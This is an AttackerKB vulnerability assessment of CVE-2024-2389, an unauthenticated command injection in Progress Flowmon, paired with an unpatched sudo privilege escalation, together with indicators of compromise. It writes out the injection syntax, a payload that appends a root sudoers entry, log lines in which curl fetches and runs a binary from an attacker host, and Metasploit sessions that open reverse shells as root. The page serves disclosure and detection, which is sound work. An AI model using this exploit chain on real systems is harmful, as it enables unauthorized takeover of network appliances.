Very High
CVE-2024-2389
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
Very High
(1 user assessed)Very High
(1 user assessed)Unknown
Unknown
Unknown
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.
Add Assessment
Ratings
-
Attacker ValueVery High
-
ExploitabilityVery High
Technical Analysis
Progress Flowmon is a network performance monitoring and security solution developed by Progress Software. It is designed to provide detailed visibility into network traffic and performance, helping organizations to monitor, analyze, and secure their networks effectively.
In Flowmon versions prior to 11.1.14 and 12.3.5, an OS command injection vulnerability exists allowing unauthenticated users to execute code in the context of the flowmon
user. The vulnerable endpoint which is accessible without authentication is /service.pdfs/confluence
. This endpoint is used to generate PDFs for the application and accepts three parameters when targeted with a GET
request.
The parameters that the GET
request expects, as seen below, are lang
, file
and pluginPath
.
The pluginPath
parameter doesn’t get sanitized and then gets used to build a $url
path:
The unsanitized $url
string gets sent to the $pdfGenerator->generate()
method. This method eventually calls the run($command)
method inside /var/www/app/flowmon/models/Exec.php
which is a wrapper for running system commands which attempts to generate the PDF with the supplied parameters.
See how it only sends one $command
argument to the run
function? This is the crux of the vulnerability which we will explore further in a moment.
A couple things to note here. First, the ironic function definition which states Should prevent cli injection
What’s interesting is that if this function was used in the way it was intended, the pluginPath
parameter likely wouldn’t be exploitable. The run
function accepts a second parameter which is an array of command arguments which are enclosed in quotes using the escapeshellarg()
function which does indeed prevent cli injection.
However, the vulnerability exists because when the command is passed to the run
function, it is passed as a long string into the first $command
parameter and does not make use of the $command_args
array which gets sanitized. Due to this it’s possible to escape the command using: $(<aribitrary command here>)
which allows you to execute commands in the context of the flowmon
user.
Priv Escalation pairing list
What better to complement a command injection exploit than a privilege escalation technique which was left unpatched by the vendor.
The flowmon
user on affected devices are allowed to run a long list of commands with sudo
privileges. Below is an excerpt, run sudo -l
to see the full list:
(root) NOPASSWD: /usr/sbin/lshw (root) NOPASSWD: /opt/MegaRAID/MegaCli/MegaCli64 (root) NOPASSWD: /etc/invea-tech/hanic/hanic-flowmon (root) NOPASSWD: /sbin/ip route (root) NOPASSWD: /usr/local/bin/remote_storage (root) NOPASSWD: /usr/bin/php /var/www/shtml/index.php Cli\:AddNewSource * (root) NOPASSWD: /etc/plugins/*/* * (root) NOPASSWD: /usr/bin/net-snmp-config * (root) NOPASSWD: /sbin/ip6tables (root) NOPASSWD: /etc/init.d/fmd-widget-data (root) NOPASSWD: /usr/sbin/SHC/self-health-checker.sh
The command we’re interested in exploiting is:
/usr/bin/php /var/www/shtml/index.php Cli\:AddNewSource *
Simply because we have write access to the file index.php
which will get executed by /usr/bin/php
with root privileges.
ls -l /var/www/shtml/index.php -rw-r--r-- 1 flowmon flowmon 1447 Jun 19 20:27 /var/www/shtml/index.php
What we can do is first back up the file index.php
. Then overwrite it with a payload which gives unlimited sudo access to the flowmon
user by appending the following to the sudoers
file.
echo \'<?php system("echo \\"ADMINS ALL=(ALL) NOPASSWD: ALL\\" >> /etc/sudoers"); ?>\' > /var/www/shtml/index.php;
Then using the command mentioned above, run our payload which we overwrote to index.php
.
sudo /usr/bin/php /var/www/shtml/index.php Cli\\:AddNewSource s;
Now we can drop whatever exploit we wish on to the target and run it with sudo:
sudo ./exploit_file.sh
IoCs
By default there is logging in place which will log each exploit attempt of the command injection vulnerability CVE-2024-2389
In the /var/www/log
folder the exec-ui.log
logs when a PDF is attempted to be generated and you can see below the $url
parameter is injected with our payload from the metasploit module.
Payload in log line:
https:\/\/localhost\/doc\/$(curl -so .\/LVdeSLLFVX http:\/\/192.168.101.78:8080\/AYs_LPTV8IDulSzceZilCA; chmod +x .\/LVdeSLLFVX; .\/LVdeSLLFVX &)\/locale\/lp0nMaG2\/index.html?file=1uwPuy5q.html&
Full log line:
./exec-ui.log:{"level":"info","requestId":"66677cd095e9a","requestName":"HTTP - \/service.pdfs\/confluence","timestamp":"2024-06-11 00:23:41.038700","depth":1,"message":"Exec::run 'node \/var\/www\/shtml\/new-pdf-generator\/pageToPdf.js input=\"https:\/\/localhost\/doc\/$(curl -so .\/LVdeSLLFVX http:\/\/192.168.101.78:8080\/AYs_LPTV8IDulSzceZilCA; chmod +x .\/LVdeSLLFVX; .\/LVdeSLLFVX &)\/locale\/lp0nMaG2\/index.html?file=1uwPuy5q.html&print\" output=\"\/var\/www\/shtml\/pdf-generator\/temp\/doc_1uwPuy5q.pdf\" format=\"pdf\" reportsBrandingColor=\"#32A64E\" lang=\"en\" maxAttemptWaitingPage=\"60\" generateNotCompleted=\"0\"'","context":{"output":["2024-06-10T22:23:39.088Z - try to launch chromium","2024-06-10T22:23:39.547Z - Chromium is launched.","2024-06-10T22:23:39.548Z - Chromium open page with url: https:\/\/localhost\/doc\/\/locale\/lp0nMaG2\/index.html?file=1uwPuy5q.html&print","2024-06-10T22:23:40.992Z - Chromium cannot open page with url: https:\/\/localhost\/doc\/\/locale\/lp0nMaG2\/index.html?file=1uwPuy5q.html&print.","Error log: Status of page is: 404","","Added to log file."],"ret":3,"command_args":[],"duration":"27069.765 ms"},"utime":1718058221.038748,"memory":2,"callee":{"project":"frontend","file":"\/var\/www\/app\/flowmon\/models\/Exec.php","line":95}}
Also the process_logger.log
log file will also contain similar traces of exploitation attempts as seen below:
./process_logger.log:{"level":"debug","requestId":"66571e8fbb307","requestName":"HTTP - \/service.pdfs\/confluence","timestamp":"2024-05-29 14:24:48.631800","depth":1,"message":"Command","context":["node \/var\/www\/shtml\/new-pdf-generator\/pageToPdf.js input=\"https:\/\/localhost\/doc\/$(curl -so .\/zLxWJANP http:\/\/192.168.50.78:8080\/Eprv7SVWQHIInVrWn0A4hg; chmod +x .\/zLxWJANP; .\/zLxWJANP &)\/locale\/0s8IAXCf\/index.html?file=eCGyQX4r.html&print\" output=\"\/var\/www\/shtml\/pdf-generator\/temp\/doc_eCGyQX4r.pdf\" format=\"pdf\" reportsBrandingColor=\"#32A64E\" lang=\"en\" maxAttemptWaitingPage=\"60\" generateNotCompleted=\"0\""],"utime":1716985488.6317589,"memory":12,"callee":{"project":"frontend","file":"\/var\/www\/app\/flowmon\/ServiceModule\/PdfsModule\/models\/PdfGenerator.php","line":91}}
As for the privilege escalation vuln, it is a bit more difficult to determine if it has been exploited. The process_logger.log
log file does indicate when the vulnerable sudo command gets called Cli\\:AddNewSource s
but because we overwrite the index.php
file in order to exploit this vuln, in the logs there’s no way of telling if this call to CliPresenter.php
was malicious.
./process_logger.log:{"level":"info","requestId":"66677b9e439c1","requestName":"CLI - Cli:AddNewSource","timestamp":"2024-06-11 00:18:06.284900","depth":0,"message":"Cli:AddNewSource started","context":{"isDaEnabled":false,"isProxy":false,"isAssigned":false,"parameters":{"module":":","action":"AddNewSource"}},"utime":1718057886.2848589,"memory":18,"callee":{"project":"frontend","file":"\/var\/www\/app\/flowmon\/presenters\/CliPresenter.php","line":768}}
When the metasploit module exploits the priv esc it:
- Over writes
/var/www/shtml/index.php
- Edits
/etc/sudoers
- Drops a payload to disk
It creates a number of IoCs but it cleans them all up. In the event a malicious attacker exploits the priv esc in a similar fashion without using the metasploit and fails to clean up after themselves there would be some very obvious signs of exploitation. One being that if you fail to restore index.php
(the page that you get redirected to immediately when navigating to the Progress Flomon’s HTTP server) you will be greeted by a page containing part of the exploit:
Attacker Value and Exploitability
It’s been some time since I gave a 5/5 for both attacker value and exploitability – though this exploit seems well deserving of both those ratings. I feel the attacker value is only heightened by the fact that the vendor decided not to acknowledge/ patch the priv esc. Both vulns are trivial to exploit and are exploitable without authentication. This one is a doozy, patching is recommended asap
Metasploit modules in action
Command injection
msf6 exploit(linux/http/progress_flowmon_unauth_cmd_injection) > show options Module options (exploit/linux/http/progress_flowmon_unauth_cmd_injection): Name Current Setting Required Description ---- --------------- -------- ----------- PRIVESC true yes Automatically try privesc to add sudo entry Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 172.174.209.101 yes The target host(s), see https://docs.metasploit.com/docs/using-meta sploit/basics/using-metasploit.html RPORT 443 yes The target port (TCP) SSL true no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The URI path to Flowmon VHOST no HTTP server virtual host Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP , WGET) FETCH_DELETE false yes Attempt to delete the binary after execution FETCH_FILENAME TkHAXYbQwlH no Name to use on remote system when storing payload; cannot contain spaces or slashes FETCH_SRVHOST no Local IP to use for serving payload FETCH_SRVPORT 8080 yes Local port to use for serving payload FETCH_URIPATH no Local URI to use for serving payload FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain space s LHOST 138.111.211.11 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic View the full module info with the info, or info -d command. msf6 exploit(linux/http/flowmon_unauth_cmd_injection) > run [*] Started reverse TCP handler on 138.111.211.11:4444 [*] Running automatic check ("set AutoCheck false" to disable) [*] Checking if 172.174.209.101:443 can be exploited! [*] Detected version: 12.02.06 [+] The target is vulnerable. Version 12.02.06 is vulnerable. [*] Attempting to execute payload... [*] Meterpreter session 1 opened (138.111.211.11:4444 -> 172.174.209.101:48856) at 2024-05-01 15:22:24 +0000 meterpreter > sysinfo Computer : flowmon.my3m4o21xjze5fomtxp5e53h2h.bx.internal.cloudapp.net OS : CentOS 7.9.2009 (Linux 3.10.0-1160.76.1.el7.flowmon.x86_64) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > getuid Server username: flowmon
Privilege Escalation
msf6 exploit(linux/local/progress_flowmon_sudo_privesc_2024) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 5 meterpreter x64/linux flowmon @ localhost.localdomain.localdomain 192.168.2.23:4444 -> 192.168.2.26:38328 (192.168.2.26) msf6 exploit(linux/local/progress_flowmon_sudo_privesc_2024) > show options Module options (exploit/linux/local/progress_flowmon_sudo_privesc_2024): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION -1 yes The session to run this module on WRITABLE_DIR /tmp yes A directory where we can write files Payload options (linux/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.2.23 yes The listen address (an interface may be specified) LPORT 5555 yes The listen port Exploit target: Id Name -- ---- 0 Automatic View the full module info with the info, or info -d command. msf6 exploit(linux/local/progress_flowmon_sudo_privesc) > run [*] Started reverse TCP handler on 192.168.2.23:5555 [*] Running automatic check ("set AutoCheck false" to disable) [*] Found 2 indicators this is a Progress Flowmon product [!] The service is running, but could not be validated. [*] Saving payload as /tmp/.fovaiiazfuhl [*] Overwriting /var/www/shtml/index.php with payload [*] Executing sudo to elevate privileges [*] Transmitting intermediate stager...(126 bytes) [*] Sending stage (3045380 bytes) to 192.168.2.26 [+] Deleted /tmp/.fovaiiazfuhl [*] Cleaning up addition to /etc/sudoers [*] Meterpreter session 9 opened (192.168.2.23:5555 -> 192.168.2.26:33408) at 2024-05-23 16:46:10 -0400 [*] Restoring /var/www/shtml/index.php file contents... meterpreter > getuid Server username: root meterpreter > sysinfo Computer : localhost.localdomain.localdomain OS : CentOS 7.9.2009 (Linux 3.10.0-1160.102.1.el7.flowmon.x86_64) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter >
References
https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- Progress Software
Products
- Flowmon
References
Additional Info
Technical Analysis
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below: